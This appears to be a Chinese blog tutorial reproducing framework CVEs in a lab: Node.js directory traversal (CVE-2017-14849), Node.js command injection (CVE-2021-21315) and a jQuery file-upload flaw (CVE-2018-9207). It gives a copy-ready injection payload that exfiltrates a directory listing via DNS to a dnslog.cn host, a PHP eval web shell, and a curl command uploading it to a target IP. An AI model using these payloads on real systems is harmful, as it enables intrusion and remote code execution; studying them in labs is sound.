框架安全&CVE复现&Django&Flask&Node.JS&JQuery

javascript开发框架

靶场搭建可用蓝易云服务器

😘😘😘😘😘😘点击查看详情

Node

Node.js 目录穿越漏洞(CVE-2017-14849)

我们可以通过F12看到有很多文件加载了

那么目录穿越是什么呢

其实就是攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件

那么我们尝试加载

main.js文件

我们可以看到是无法读取到的

说明我们的路径还是不正确

那么如果真的要搞清楚这个路径需要用到工具去对路径进行拆解了

那么这个文件的真实路径是

/static/main.js

我们尝试下

可以看见是读取的到的

那么就证明了

如果你知道路径你就可以去穿越目录了

参考

(CVE-2017-14849)Node.js 目录穿越漏洞

node.js 命令执行 (CVE-2021-21315)

这个的话怎么搞呢

首先用到一个网站工具

DNSLog Platform

获取一个url

这时候套用模板就可以了

复制代码
/api/getServices?name[]=$(ping%20`ls%20/tmp`.qki7ut.dnslog.cn)

替换上面的url

复制代码
/api/getServices?name[]=$(ping%20`ls%20/tmp`.n9wgwv.dnslog.cn)

直接替换上

然后访问

这个时候我们回到那个工具网站

点击上面的那个按钮刷新几下就🆗了

jQuery

jQuery 文件上传漏洞(CVE-2018-9207)

主页面

然后写一个一句话木马

php 复制代码
<?php
    @eval($_POST['shell']);
    ?>

然后在当前目录下打开cmd

复制代码
curl -F "myfile=@shell.php" "http://123.58.236.76:19514/jquery-upload-file/php/upload.php"

执行这条命令

只需要改目标ip和端口还有就你的一句话木马文件就可以了

/jquery-upload-file/

相关推荐
火白学安全8 分钟前
《Python红队攻防脚本零基础编写:入门篇(一)》
python·安全·web安全·网络安全·系统安全
携欢10 分钟前
PortSwigger靶场之Exploiting server-side parameter pollution in a REST URL通关秘籍
前端·javascript·安全
好家伙VCC1 小时前
**发散创新:渗透测试方法的深度探索与实践**随着网络安全形势日益严峻,渗透测试作为评估系统安全的
java·python·安全·web安全·系统安全
人邮异步社区1 小时前
内网攻防实战图谱:从红队视角构建安全对抗体系
网络·安全·web安全
胡耀超2 小时前
大数据平台安全指南——大数据平台安全架构全景:从认证授权到数据治理的企业级实践指南——认证、授权、审计、加密四大支柱
安全·数据治理·数据安全·权限管理·安全架构·hadoop生态·合规审计
深盾科技4 小时前
C/C++逆向分析实战:变量的奥秘与安全防护
c语言·c++·安全
你的人类朋友9 小时前
“签名”这个概念是非对称加密独有的吗?
前端·后端·安全
携欢11 小时前
PortSwigger靶场之CSRF where token validation depends on request method通关秘籍
安全·web安全·csrf
周杰伦_Jay11 小时前
【计算机网络表格图表解析】网络体系结构、数据链路层、网络层、传输层、应用层、网络安全、故障排查
计算机网络·安全·web安全
nueroamazing12 小时前
PPT-EA:PPT自动生成器
vue.js·python·语言模型·flask·大模型·项目·ppt